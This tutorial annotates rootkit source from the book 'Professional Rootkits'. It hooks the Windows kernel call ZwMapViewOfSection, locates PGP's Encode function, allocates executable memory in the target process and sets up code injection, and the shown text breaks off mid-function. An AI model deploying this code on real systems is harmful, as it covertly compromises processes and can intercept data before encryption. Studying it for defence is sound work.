Using API hooking for code injection

One method of code injection is API hooking. In this approach a kernel API such as ZwMapViewOfSection (the call through which DLLs are mapped into a process) is hooked first, and from inside that hook we can then hook functions of the dynamic link library being mapped. By hooking ZwMapViewOfSection we can detect when a DLL is mapped into a process and start the injection at that point: we overwrite the start of the target function so that our code runs before or after it.

Code injection algorithm

Our methodology is simple, although it involves many details. The algorithm is:

  • Let the dynamic link library be mapped into the user process's memory
  • Find the address of the function to hook in the user process's memory
  • Allocate space in the user process's memory
  • Write our function (the one that replaces the hooked function) and any other required data to this space
  • Find the first instruction of the hooked function
  • Replace it with a jump to our function
  • Copy the first instruction, followed by a jump back to the hooked function, into our hooking function

The picture below shows the concept:

Figure 4-2: User-mode hooks before and after code injection (from the book Professional Rootkits)

You need a solid background in operating systems and the x86 platform to follow some of the logic behind API hooking. For example, we must allocate memory inside the process that maps the DLL containing the hooked function, because the jump we place in that function can only transfer control to code that is valid in that process's own address space, and the regions already mapped there are in use. Allocating fresh memory in the process gives us a place to copy the code that replaces the hooked function.

The trampoline is the entry point of our hook. The first instruction of the hooked function is its entry point, and that is what we overwrite. What happens to the overwritten instruction? We copy it into the allocated memory, and when we want to pass control back to the hooked function we execute the saved copy first.
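The byte-level bookkeeping behind "replace it with a jump" and "copy the first instruction and a return jump" can be tried on plain arrays. The sketch below is not taken from the book: the function names, the pretend addresses, the sample prologue bytes and the offset at which the saved bytes are kept are all hypothetical, and nothing in it is executed as machine code. It assumes a 5-byte `jmp rel32` (opcode 0xE9), so the saved bytes must cover whole instructions adding up to at least 5 bytes.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define JMP_REL32_SIZE 5u   /* opcode 0xE9 followed by a 32-bit displacement */
#define SAVED_OFFSET   16u  /* hypothetical offset of the saved bytes in the stub */

/* Encode "jmp rel32" into dst. from_addr is the address where the jump
   itself will live; to_addr is where execution should continue. */
void encode_jmp_rel32(uint8_t *dst, uint32_t from_addr, uint32_t to_addr)
{
    /* The displacement is relative to the end of the jump instruction. */
    uint32_t disp = to_addr - (from_addr + JMP_REL32_SIZE);
    dst[0] = 0xE9;
    dst[1] = (uint8_t)(disp & 0xFF);
    dst[2] = (uint8_t)((disp >> 8) & 0xFF);
    dst[3] = (uint8_t)((disp >> 16) & 0xFF);
    dst[4] = (uint8_t)((disp >> 24) & 0xFF);
}

/* Recover the absolute target of an encoded "jmp rel32" (used for checking). */
uint32_t decode_jmp_target(const uint8_t *src, uint32_t from_addr)
{
    uint32_t disp = (uint32_t)src[1] | ((uint32_t)src[2] << 8) |
                    ((uint32_t)src[3] << 16) | ((uint32_t)src[4] << 24);
    return from_addr + JMP_REL32_SIZE + disp;
}

/* Simulate the patch on arrays standing in for the function and the stub. */
int demo_patch(void)
{
    const uint32_t func_addr = 0x00401000u; /* pretend address of the hooked function */
    const uint32_t stub_addr = 0x00350000u; /* pretend address of the injected stub */
    /* Sample prologue: mov edi,edi / push ebp / mov ebp,esp / sub esp,10h */
    uint8_t func[8] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10 };
    uint8_t stub[32];

    memset(stub, 0x90, sizeof stub);                 /* fill with NOPs */
    memcpy(stub + SAVED_OFFSET, func, JMP_REL32_SIZE); /* 1. save the original bytes */
    encode_jmp_rel32(stub + SAVED_OFFSET + JMP_REL32_SIZE, /* 2. jump back past them */
                     stub_addr + SAVED_OFFSET + JMP_REL32_SIZE,
                     func_addr + JMP_REL32_SIZE);
    encode_jmp_rel32(func, func_addr, stub_addr);    /* 3. divert the function entry */

    assert(decode_jmp_target(func, func_addr) == stub_addr);
    assert(stub[SAVED_OFFSET] == 0x8B && stub[SAVED_OFFSET + 4] == 0xEC);
    assert(decode_jmp_target(stub + SAVED_OFFSET + JMP_REL32_SIZE,
                             stub_addr + SAVED_OFFSET + JMP_REL32_SIZE)
           == func_addr + JMP_REL32_SIZE);
    return 0;
}
```

Calling `demo_patch()` from a test program checks that the entry jump lands on the stub and that the return jump lands just past the overwritten bytes. The unsigned arithmetic wraps, so backward jumps (a stub below the function, as here) need no special handling.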

Design concerns for API hooking and code injection

Before jumping into the code, ask yourself these questions and look for the answers in the C++ source code below.

How do we locate a function in a dynamic library?

A function name ends up as an address in compiled code, so how can we search for a name among raw opcodes in memory?

The hooked function takes parameters, and our custom code may need them. How can we access them?

What must we inject to divert execution to our injected code or trampoline function?

How can we find the address of our injected code or trampoline function, so that we can use it as the jump target?

Pay close attention to the difference between the addresses of code inside our example rootkit and the addresses of the same code in the calling process. We write the hooking function in the rootkit and then place a copy of it in the running process; the code as compiled into the rootkit is never meant to run there directly.

How do we know what the first instruction of the hooked function is?

How do we transfer control to the post-hook after the original hooked function has run?

What should the post-hook do so that the caller of the hooked function does not notice anything wrong?

What can we do in our custom injected hook code?

 

API hooking

OK, we start from the hooked kernel function ZwMapViewOfSection (refer to the kernel hooks article to see how the hook itself is installed). All of the code comes from the book “Professional Rootkits” by Ric Vieler, but I have commented it heavily and tried to explain the vague lines.

// Process Inject Dynamic Link Libraries

NTSTATUS NewZwMapViewOfSection(

    IN HANDLE SectionHandle,

    IN HANDLE ProcessHandle,

    IN OUT PVOID *BaseAddress,

    IN ULONG ZeroBits,

    IN ULONG CommitSize,

    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

    IN OUT PSIZE_T ViewSize,

    IN SECTION_INHERIT InheritDisposition,

    IN ULONG AllocationType,

    IN ULONG Protect )

{

            NTSTATUS status;

 

            // First complete the standard mapping process

            status = OldZwMapViewOfSection(    SectionHandle, // A section object is a region of memory that can be shared between processes; see https://msdn.microsoft.com/en-us/library/windows/hardware/ff563684(v=vs.85).aspx

                                                            ProcessHandle,

                                                            BaseAddress,

                                                            ZeroBits,

                                                            CommitSize,

                                                            SectionOffset,

                                                            ViewSize,

                                                            InheritDisposition,

                                                            AllocationType,

                                                            Protect );

 

            // Now remap as required ( imageOffset only known for versions 4 & 5 )

            if( NT_SUCCESS( status ) && ( majorVersion == 4 || majorVersion == 5 ) )

            {

                        unsigned int     imageOffset = 0;

                        VOID*                         pSection = NULL;

                        unsigned int     imageSection = FALSE;

                        HANDLE                                 hRoot = NULL;

                        PUNICODE_STRING objectName = NULL;

                        PVOID                         pImageBase = NULL;

                        UNICODE_STRING    library1 = { 0 };

                        UNICODE_STRING    library2 = { 0 };

                        CALL_DATA_STRUCT          callData[TOTAL_HOOKS] = { 0 };

                        int                                                        hooks2inject = 0;

                       

                        // Image location higher in version 4

                        if( majorVersion == 4 )

                                    imageOffset = 24;

 

                        if( ObReferenceObjectByHandle(       SectionHandle, // validates the handle, takes a reference so the object cannot go away while we use it, and returns a pointer to the section object. Object handle overview: https://msdn.microsoft.com/en-us/library/windows/hardware/ff557758(v=vs.85).aspx

                                                                                                                        SECTION_MAP_EXECUTE,

                                                                                                                        *MmSectionObjectType, // the layout of this object type is undocumented

                                                                                                                        KernelMode,

                                                                                                                        &pSection,

                                                                                                                        NULL ) == STATUS_SUCCESS )

                        {

                                    // Check to see if this is an image section

                                    // If it is, get the root handle and the object name

                                    _asm

                                    {

                                                mov     edx, pSection

                                                mov     eax, [edx+14h] // load the pointer stored at pSection + 20 bytes

                                                add     eax, imageOffset // add the version-dependent offset (24 on version 4, 0 on version 5)

                                                mov     edx, [eax] // dereference again to reach the undocumented structure describing the mapping

                                                test    byte ptr [edx+20h], 20h // test the byte at offset 32 against mask 20h (00100000b)

                                                jz      not_image_section // bit clear: this is not an image section

                                                mov     imageSection, TRUE

                                                mov     eax, [edx+24h] // load the pointer stored at offset 36

                                                mov     edx, [eax+4] // root handle

                                                mov     hRoot, edx

                                                add     eax, 30h // the object name lives 48 bytes into that structure

                                                mov     objectName, eax

                                                not_image_section:

 

                                    }

                                    if( BaseAddress )

                                                pImageBase = *BaseAddress;

 

                                    // Mapping a DLL

                                    if( imageSection && pImageBase && objectName && objectName->Length > 0 )

                                    {

                                                // define libraries of interest

                                                RtlInitUnicodeString( &library1, L"kernel32.dll" ); // initialise the UNICODE_STRING to point at the literal (no copy is made)

                                                RtlInitUnicodeString( &library2, L"PGPsdk.dll" );

 

                                                if ( IsSameFile( &library1, objectName ) ) // kernel32 (note: objectName contains the full path)

                                                {

                                                            kernel32Base = pImageBase;

                                                }

                                                else if ( IsSameFile( &library2, objectName ) ) // PGPsdk

                                                {

                                                            // Pattern for PGP 9.0 Encode

                                                            BYTE pattern1[] = {    0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8, 0x81, 0xEC, \

                                                                                                                        0xFC, 0x00, 0x00, 0x00, 0x53, 0x33, 0xC0, 0x56, \

                                                                                                                        0x57, 0xB9, 0x26, 0x00, 0x00, 0x00, 0x8D, 0x7C, \

                                                                                                                        0x24, 0x18, 0xF3, 0xAB };

 

                                                            PVOID pfEncode = GetFunctionAddress( pImageBase, NULL, pattern1, sizeof(pattern1) ); // scans the image starting at pImageBase for the opcode bytes in pattern1

 

                                                            if( !pfEncode )

                                                            {

                                                            // Pattern for PGP 9.5 Encode

                                                                        BYTE pattern2[] = {    0x81, 0xEC, 0xFC, 0x00, 0x00, 0x00, 0x53, 0x55, \

                                                                                                                                    0x33, 0xDB, 0x68, 0x98, 0x00, 0x00, 0x00, 0x8D, \

                                                                                                                                    0x44, 0x24, 0x14, 0x53, 0x50, 0x89, 0x9C, 0x24, \

                                                                                                                                    0xB4, 0x00, 0x00, 0x00 };

 

                                                                        pfEncode = GetFunctionAddress( pImageBase, NULL, pattern2, sizeof(pattern2) );

                                                            }

 

                                                            if( pfEncode )

                                                            {

                                                                        hooks2inject = 1; // only one hook here, but more can be added by filling further callData elements

                                                                        callData[0].index = USERHOOK_beforeEncode;

                                                                        callData[0].hookFunction = pfEncode;

                                                                        callData[0].parameters = 2;

                                                                        callData[0].callType = CDECL_TYPE;

                                                                        callData[0].stackOffset = 0;

                                                                        DbgPrint("comint32: NewZwMapViewOfSection pfEncode = %x",pfEncode);

                                                            }

                                                            else

                                                            {

                                                                        DbgPrint("comint32:  PGP Encode not found.");

                                                            }

                                                }

                                                if( hooks2inject > 0 ) // only when at least one function to hook was found (currently just Encode)

                                                {

                                                            PCHAR injectedMemory;

 

                                                            // prepare memory

                                                            injectedMemory = allocateUserMemory(); // allocate memory in process area

                                                            // inject

                                                            if( !processInject( (CALL_DATA_STRUCT*)&callData, hooks2inject, injectedMemory ) ) // copy code and data to injectedMemory and place hooks in function

                                                            {

                                                                        DbgPrint("comint32: processInject failed!\n" );

                                                            }

                                                }

                                    }

                                    ObDereferenceObject( pSection );

                        }

            }

            return status;

}

 

First we call the original ZwMapViewOfSection (OldZwMapViewOfSection) to map the requested view, which may be a DLL, a data file, a shared buffer and so on. Then ObReferenceObjectByHandle gives us a pointer to the section object behind SectionHandle. As you might expect, finding a function to hook in memory is not easy. The first step is to know when the desired library (the one containing the function to hook) is being mapped by a process. Unfortunately the structures that tell us this are undocumented, so we have to dig through memory. Writing [x] for dereferencing the pointer at x, let S = [[pSection + 20] + imageOffset], where imageOffset is 24 on version 4 and 0 on version 5. If the sixth bit (mask 0x20) of the byte at S + 32 is set, the section is an image; in that case [[S + 36] + 4] is the root handle and [S + 36] + 48 is the address of the object name. This is the logic of the inline assembly block. After that, IsSameFile checks whether the name is one we care about; if it is, we search the image from its base for the function to hook, either by its opcode pattern or by its exported name, using GetFunctionAddress. To inject code we need memory in the calling process: allocateUserMemory allocates it and returns its base address. Once the function's address is known, processInject copies our code there and places the hook.
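The search "by its opcodes" is a plain byte-pattern scan. A minimal user-mode sketch, assuming the image is available as an ordinary byte buffer; `find_pattern` and `demo_find_pattern` are hypothetical names, and the sample bytes are made up apart from the six-byte prologue, which matches the start of the PGP 9.0 pattern in the listing:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Return the offset of the first occurrence of pattern inside image,
   or -1 when the pattern does not occur. */
long find_pattern(const unsigned char *image, size_t image_size,
                  const unsigned char *pattern, size_t pattern_size)
{
    size_t i;

    if (pattern_size == 0 || pattern_size > image_size)
        return -1;
    /* The last valid start position is image_size - pattern_size. */
    for (i = 0; i + pattern_size <= image_size; i++) {
        if (memcmp(image + i, pattern, pattern_size) == 0)
            return (long)i;
    }
    return -1;
}

/* Scan a made-up buffer for a prologue-like byte sequence. */
int demo_find_pattern(void)
{
    const unsigned char image[] = { 0x90, 0x90, 0xCC, 0x55, 0x8B,
                                    0xEC, 0x83, 0xE4, 0xF8, 0xC3 };
    const unsigned char prologue[] = { 0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8 };
    const unsigned char missing[] = { 0x12, 0x34 };

    assert(find_pattern(image, sizeof image, prologue, sizeof prologue) == 3);
    assert(find_pattern(image, sizeof image, missing, sizeof missing) == -1);
    return 0;
}
```

The returned value is an offset, not a pointer. That mirrors what the driver has to do: the scan runs over a kernel mapping of the image, and the offset is then added to the image's base address in the user process.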

The preceding code has to do by hand many things that you take for granted in user land: in kernel programming you may need to write your own function to compare two strings, and you must manage every memory access explicitly. IsSameFile, IsSameString and checkPattern are helper functions that compare strings or bytes:

// This should be fast!

int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size )

{

            register unsigned char* p1 = pattern1;

            register unsigned char* p2 = pattern2;

            while( size-- > 0 )

    {

                        if( *p1++ != *p2++ )

                                    return 1;

            }

            return 0;

}

 

// Used to compare a full path to a file name(after the last \)

BOOL IsSameFile(PUNICODE_STRING shortString, PUNICODE_STRING longString)

{

            USHORT index;

            USHORT longLen;

            USHORT shortLen;

            USHORT count;

 

            index = longString->Length / 2; // Length is in bytes; divide by 2 for the WCHAR count

 

            // search backwards for the last backslash; index ends at the first

            // character of the file name (0 when the path has no backslash)

            while( index > 0 && longString->Buffer[index - 1] != L'\\' )

                        index--;

 

            // check for same length first

            longLen = (longString->Length / 2) - index; // number of characters after the last backslash

            shortLen = shortString->Length / 2;

            if( shortLen != longLen )

                        return FALSE;

 

            // Compare

            count = 0;

            while ( count < longLen )

                        if ( longString->Buffer[index++] != shortString->Buffer[count++] )

                                    return FALSE;

 

            // Match!

            return TRUE;

}

 

// Compare two char strings, ignoring case

BOOL IsSameString( char* first, char* second )

{

            while( *first && *second )

            {

                        if( tolower( *first ) != tolower( *second ) )

                                    return FALSE;

                        first++;

                        second++;

            }

            if( *first || *second ) // one string ended before the other

                        return FALSE;

 

            // strings match!

            return TRUE;

}
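To experiment with the file-name comparison outside the kernel, here is a minimal user-mode sketch. It is not the book's code: `same_file_name` is a hypothetical name, it works on NUL-terminated `wchar_t` strings rather than `UNICODE_STRING`, and unlike IsSameFile it ignores case.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>
#include <wctype.h>

/* Return 1 when the last component of path (the part after the final
   backslash) equals name, ignoring case; return 0 otherwise. */
int same_file_name(const wchar_t *name, const wchar_t *path)
{
    const wchar_t *base;

    assert(name != NULL && path != NULL);

    base = wcsrchr(path, L'\\');
    base = base ? base + 1 : path; /* no backslash: the whole path is the name */

    while (*base && *name) {
        if (towlower((wint_t)*base) != towlower((wint_t)*name))
            return 0;
        base++;
        name++;
    }
    /* Equal only if both strings ended at the same time. */
    return *base == L'\0' && *name == L'\0';
}
```

For example, `same_file_name(L"kernel32.dll", L"\\WINDOWS\\system32\\KERNEL32.DLL")` matches, while a path ending in `mykernel32.dll` does not, because the comparison starts right after the last backslash.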

 

In kernel programming you must be sure that the memory you reference is mapped and resident, otherwise you risk a page fault. That is why we describe the user-mode view returned by ZwMapViewOfSection with an MDL, lock its pages so that they cannot be paged out, and map them into system address space before reading them. MapKernelAddress and FreeKernelAddress do this; here is their source code:

// Map user address space into the kernel

PVOID MapKernelAddress( PVOID pAddress, PMDL* ppMDL, ULONG size ) // returns a system-space address that maps the same physical pages as pAddress

{

            PVOID pMappedAddr = NULL;

           

            *ppMDL = IoAllocateMdl( pAddress, size, FALSE, FALSE, NULL ); // allocate a Memory Descriptor List (MDL) describing size bytes at pAddress

            if( *ppMDL == NULL )

                        return NULL;

 

            __try

            {

                        MmProbeAndLockPages( *ppMDL, KernelMode ,IoReadAccess );

            }

            __except( EXCEPTION_EXECUTE_HANDLER )

            {

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            pMappedAddr = MmGetSystemAddressForMdlSafe( *ppMDL, HighPagePriority ); // returns the system-space virtual address that maps the physical pages described by the MDL, or NULL if the pages cannot be mapped

            if( !pMappedAddr )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            return pMappedAddr;

}

 

// Unmap, unlock and free a mapping created by MapKernelAddress

VOID FreeKernelAddress( PVOID* ppMappedAddr, PMDL* ppMDL )

{

            if( *ppMappedAddr && *ppMDL )

                        MmUnmapLockedPages( *ppMappedAddr, *ppMDL );

 

            *ppMappedAddr = NULL;

            if( *ppMDL )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

            }

            *ppMDL = NULL;

}

 

In addition to these helpers, GetFunctionAddress is the important function that finds the address of the function to hook. It does so by digging into the DLL image. A DLL starts with a DOS header, accessed in the code through a PIMAGE_DOS_HEADER pointer (Figure 1). Its e_lfanew field holds the offset of the NT headers, accessed through PIMAGE_NT_HEADER (Figure 2), and the NT headers contain a data directory whose export entry holds the virtual address of the export directory, accessed through PIMAGE_EXPORT_DIRECTORY (Figure 3). The export directory refers to several arrays that hold the names of the exported functions and their addresses. Locating a function by name is done through this structure.

Figure 1: PIMAGE_DOS_HEADER structure

Figure 2: PIMAGE_NT_HEADER structure

Figure 3: PIMAGE_EXPORT_DIRECTORY structure

Below is the code of GetFunctionAddress:

// Get the address of a function from a DLL

// Pass in the base address of the DLL

// Pass function name OR pattern and pattern length

PVOID GetFunctionAddress(  PVOID BaseAddress,

                                                                                    char* functionName,

                                                                                    PBYTE pattern,

                                                                                    size_t patternLength  )

{

    ULONG imageSize;

    ULONG virtualAddress;

    PVOID returnAddress;

    PULONG functionAddressArray;

    PWORD ordinalArray;

    PULONG functionNameArray;

    ULONG loop;

    ULONG ordinal;

            PVOID mappedBase;

            PMDL pMDL;

            BYTE* bytePtr;

            BYTE* maxBytePtr;

    PIMAGE_DOS_HEADER pDOSHeader;

    PIMAGE_NT_HEADER pNTHeader;

    PIMAGE_EXPORT_DIRECTORY exportDirectory;

 

            imageSize = GetImageSize( BaseAddress ); // size of the DLL image

            mappedBase = MapKernelAddress( BaseAddress, &pMDL, imageSize ); // lock the image and map it into system space so that it can be read safely

            if( !mappedBase ) // mapping failed: there is nothing to search

                        return NULL;

 

            if ( functionName == NULL )

            {

                        // Search for function pattern

                        returnAddress = 0;

                        maxBytePtr = (PBYTE)((DWORD)mappedBase + (DWORD)imageSize - (DWORD)patternLength);

                        for( bytePtr = (PBYTE)mappedBase; bytePtr < maxBytePtr; bytePtr++ )

                        {         

                                    if( checkPattern( bytePtr, pattern, patternLength ) == 0 )

                                    {

                                                returnAddress = (PVOID)((DWORD)BaseAddress + (DWORD)bytePtr - (DWORD)mappedBase); // bytePtr is an address in the kernel mapping; its offset from mappedBase, added to BaseAddress, gives the function's address in the user process

                                                break;

                                    }

                        }

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return returnAddress;

            }

           

            // Search for function name

    pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;

    pNTHeader = (PIMAGE_NT_HEADER)((PCHAR)mappedBase + pDOSHeader->e_lfanew);

    imageSize = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; // IMAGE_DIRECTORY_ENTRY_EXPORT is index 0 of the data directory; Size is the size in bytes of the export directory data

    virtualAddress = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; // relative virtual address (RVA) of the export directory

    exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)mappedBase + virtualAddress); // see Figure 3 for the structure

    functionAddressArray = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfFunctions); // array of RVAs of the exported functions

    ordinalArray  = (PWORD)((PCHAR)mappedBase + exportDirectory->AddressOfNameOrdinals); // array of indexes into AddressOfFunctions: find name X at position i in AddressOfNames, then ordinalArray[i] is the index of X's address in AddressOfFunctions

    functionNameArray     = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfNames); // array of RVAs of the exported names

 

            ordinal = (ULONG)functionName;

    if (!ordinal)

            {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return 0;

            }

    if( ordinal <= exportDirectory->NumberOfFunctions ) // a small value is treated as an ordinal rather than a name pointer, so the function can also resolve by ordinal

    {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

        return (PVOID)((PCHAR)BaseAddress + functionAddressArray[ordinal - 1]);

    }

 

    for( loop = 0; loop < exportDirectory->NumberOfNames; loop++ )

    {

                        ordinal = ordinalArray[loop];

                        if( functionAddressArray[ordinal] < virtualAddress || functionAddressArray[ordinal] >= virtualAddress + imageSize ) // skip entries whose address lies inside the export directory itself (forwarded exports)

        {

            if( IsSameString( (PSTR)((PCHAR)mappedBase + functionNameArray[loop]), functionName ) ) // functionNameArray holds RVAs, so the base of our kernel mapping is added to get a usable pointer to the function name

            {

                                                returnAddress = (PVOID)functionAddressArray[ordinal];

                                                if( mappedBase )

                                                            FreeKernelAddress( &mappedBase, &pMDL );

                return (PVOID)((DWORD)BaseAddress + (DWORD)returnAddress); // the RVA is added to BaseAddress because we want the function's address in the user process

            }

        }

    }

 

            DbgPrint("comint32: EXPORT NOT FOUND, function = %s", functionName);

           

            if( mappedBase )

                        FreeKernelAddress( &mappedBase, &pMDL );

            return 0;

}
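The name lookup above goes through three parallel arrays: names, name ordinals and function addresses. The following user-mode sketch shows the same walk on a tiny synthetic buffer. It is an illustration only: `export_dir_t` is a hypothetical, simplified stand-in for the real export directory, the offsets and export names are made up, and bounds checks on the offsets are omitted.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the export directory: only the fields the
   lookup needs. All addresses are offsets (RVAs) from the image base. */
typedef struct {
    uint32_t number_of_functions;
    uint32_t number_of_names;
    uint32_t address_of_functions;     /* RVA of an array of function RVAs */
    uint32_t address_of_names;         /* RVA of an array of name RVAs */
    uint32_t address_of_name_ordinals; /* RVA of an array of 16-bit indexes */
} export_dir_t;

static uint32_t read_u32(const uint8_t *image, uint32_t rva)
{
    uint32_t v;
    memcpy(&v, image + rva, sizeof v); /* memcpy avoids unaligned access */
    return v;
}

static uint16_t read_u16(const uint8_t *image, uint32_t rva)
{
    uint16_t v;
    memcpy(&v, image + rva, sizeof v);
    return v;
}

/* Return the RVA of the export called wanted, or 0 when it is not found. */
uint32_t find_export_rva(const uint8_t *image, const export_dir_t *dir,
                         const char *wanted)
{
    uint32_t i;

    for (i = 0; i < dir->number_of_names; i++) {
        uint32_t name_rva = read_u32(image, dir->address_of_names + 4u * i);
        if (strcmp((const char *)image + name_rva, wanted) == 0) {
            /* Position i in the name array selects the index of the address. */
            uint16_t index = read_u16(image, dir->address_of_name_ordinals + 2u * i);
            if (index >= dir->number_of_functions)
                return 0;
            return read_u32(image, dir->address_of_functions + 4u * index);
        }
    }
    return 0;
}

/* Build a fake image with two exports and look one of them up. */
uint32_t demo_lookup(const char *wanted)
{
    uint8_t image[256];
    const export_dir_t dir = { 2, 2, 0x40, 0x50, 0x60 };
    const uint32_t functions[2] = { 0x1000, 0x2000 };
    const uint32_t names[2] = { 0x80, 0x90 };
    const uint16_t ordinals[2] = { 1, 0 }; /* Alpha -> functions[1], Beta -> functions[0] */

    assert(wanted != NULL);
    memset(image, 0, sizeof image);
    memcpy(image + 0x40, functions, sizeof functions);
    memcpy(image + 0x50, names, sizeof names);
    memcpy(image + 0x60, ordinals, sizeof ordinals);
    strcpy((char *)image + 0x80, "Alpha");
    strcpy((char *)image + 0x90, "Beta");

    return find_export_rva(image, &dir, wanted);
}
```

The result is an RVA. As in GetFunctionAddress, it still has to be added to the base address at which the image is mapped in the target process to become a usable address.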

 

To allocate memory for our injected code we used allocateUserMemory. Here is the source code:

 

PCHAR allocateUserMemory()
{
            LONG memorySize;
            LONG tableSize;
            LONG codeSize;
            LONG dataSize;
            ULONG buffer[2];
            NTSTATUS status;
            PCHAR pMemory;
            IN_PROCESS_DATA* pData;

            // Calculate sizes
            // tableSize = (DetourFunction - HookTable) * TOTAL_HOOKS
            // codeSize = EndOfInjectedCode - DetourFunction
            // dataSize = sizeof( IN_PROCESS_DATA )
            __asm
            {
                        lea eax, HookTable
                        lea ebx, DetourFunction
                        lea ecx, EndOfInjectedCode
                        mov edx, ebx
                        sub edx, eax
                        mov tableSize, edx
                        mov edx, ecx
                        sub edx, ebx
                        mov codeSize, edx
            }
            tableSize = tableSize * TOTAL_HOOKS;
            dataSize = sizeof( IN_PROCESS_DATA );
            memorySize = tableSize + codeSize + dataSize; // total size to allocate in the process

            // Allocate memory
            buffer[0] = 0;
            buffer[1] = memorySize;
            // The process itself called ZwMapViewOfSection, and our hook runs in the context of
            // that process, so allocating in the "current process" allocates in the target process.
            // (HANDLE)-1 is the pseudo-handle for the current process; buffer[0] receives the base
            // address; buffer[1] passes the requested size and receives the size actually allocated.
            status = ZwAllocateVirtualMemory( (HANDLE)-1, (PVOID*)buffer, 0, &buffer[1], MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
            pMemory = (PCHAR)(buffer[0]); // base address of the allocated region

            if( !NT_SUCCESS( status ) || !pMemory )
                        return NULL;

            // initialize memory
            memset( pMemory, 0x90, tableSize + codeSize ); // fill the table and code areas with NOPs (0x90)
            pData = (IN_PROCESS_DATA*)(pMemory + tableSize + codeSize );
            memset( (PVOID)pData, 0, dataSize ); // zero the data area

            return pMemory;
}

 

 

HookTable, DetourFunction and IN_PROCESS_DATA are the code and data to be injected into the calling process. You will see their source in a minute; for now, just note that they are laid out in exactly this order. All of the injected code lies between HookTable and EndOfInjectedCode: the hook table runs from HookTable up to DetourFunction, and the detour code from DetourFunction up to EndOfInjectedCode. IN_PROCESS_DATA is just a struct that keeps the pointers to the kernel library functions.

Code injection

With code injection we change the first instruction of the hooked function so that it transfers control to our custom code, and we copy the code we need into the process.

To inject our code we must know its destination addresses. When we allocate memory we learn the base address of the allocation, and that is where we start copying. Not everything we copy is executable code: we reserve some space to pass data from the hooked kernel function to the user-land hook (this data tells the hooking function how to set up the stack so that no fault or exception occurs). We also need to save the original first instruction of the hooked function, and to reserve space for references to OS library functions. getHookPointers finds the offsets of these areas by adding the size of each section to the start of the allocated memory, keeping track of where each section ends.

BOOL getHookPointers( PCHAR pMemory, PCHAR* pTable, PCHAR* pCode, PCHAR* pData ) // sets pTable to the address of the HookTable copy, pCode to the DetourFunction copy and pData to the IN_PROCESS_DATA block

{

            LONG  tableSize = 0;

            LONG  codeSize = 0;

            LONG  dataSize = 0;

 

            __asm

            {

                        lea eax, HookTable

                        lea ebx, DetourFunction

                        lea ecx, EndOfInjectedCode

                        mov edx, ebx

                        sub edx, eax

                        mov tableSize, edx

                        mov edx, ecx

                        sub edx, ebx

                        mov codeSize, edx

            }

           

            tableSize = tableSize * TOTAL_HOOKS;

            dataSize = sizeof(IN_PROCESS_DATA);

            *pTable = pMemory;

            *pCode = *pTable + tableSize;

            *pData = *pCode + codeSize;

            return TRUE;

}

 

pTable is where the modified first instruction of the hooked function will point. We also keep the parameters passed from the kernel and the original first instruction of the hooked function there. After execution is transferred to pTable, some initialization happens and then execution continues at pCode. pData is where we save pointers to kernel library functions.
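The pointer arithmetic in getHookPointers amounts to laying three areas end to end. A minimal sketch of that layout with the sizes passed in as plain numbers; `hook_layout_t`, `compute_layout` and `table_entry` are hypothetical names, and indexing the table as `index * entry_size` is an assumption based on tableSize being one HookTable-sized slot per hook.

```c
#include <assert.h>
#include <stddef.h>

/* Start addresses of the three areas inside one allocation. */
typedef struct {
    char *table; /* one hook-table slot per hook */
    char *code;  /* detour code, shared by all hooks */
    char *data;  /* per-process data block */
} hook_layout_t;

/* Lay the areas out back to back: table, then code, then data. */
hook_layout_t compute_layout(char *memory, size_t entry_size,
                             size_t total_hooks, size_t code_size)
{
    hook_layout_t layout;

    layout.table = memory;
    layout.code = layout.table + entry_size * total_hooks;
    layout.data = layout.code + code_size;
    return layout;
}

/* Address of the slot for hook number index (assumed indexing scheme). */
char *table_entry(const hook_layout_t *layout, size_t entry_size, size_t index)
{
    return layout->table + entry_size * index;
}

/* Check the offsets for made-up sizes: 3 slots of 32 bytes, 100 bytes of code. */
int demo_layout(void)
{
    static char memory[256];
    hook_layout_t layout = compute_layout(memory, 32, 3, 100);

    assert(layout.table == memory);
    assert(layout.code == memory + 96);
    assert(layout.data == memory + 196);
    assert(table_entry(&layout, 32, 2) == memory + 64);
    return 0;
}
```

Because every address is derived from the allocation base, the same computation works in both places that need it: when sizing the allocation and when copying the pieces into it.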

Here are the codes to be copied in pTable:

#define EMIT_FOUR( x ) __asm{ __asm _emit x __asm _emit x __asm _emit x __asm _emit x } // _emit places the byte x directly in the code stream, so EMIT_FOUR writes x four times

void __declspec(naked) HookTable( void )

{

            __asm // note that edx is overwritten without being saved; this is acceptable at a function entry point because edx is a caller-saved scratch register under cdecl and stdcall

            {

                        push eax // save eax; only eax and edx are used here, and edx carries the parameter for DetourFunction

                        xor eax, eax

                        call phoney_call // call the next line so that its run-time address is pushed on the stack as the return address (lea would only give the address in the compiled image)

phoney_call:

                        lea eax, phoney_call

                        lea edx, phoney_jump

                        sub edx, eax // edx = phoney_jump - phoney_call, a distance that is the same in every copy of this code

                        pop eax // pop the run-time address of phoney_call that the call pushed

                        add eax, edx // eax = run-time address of phoney_jump

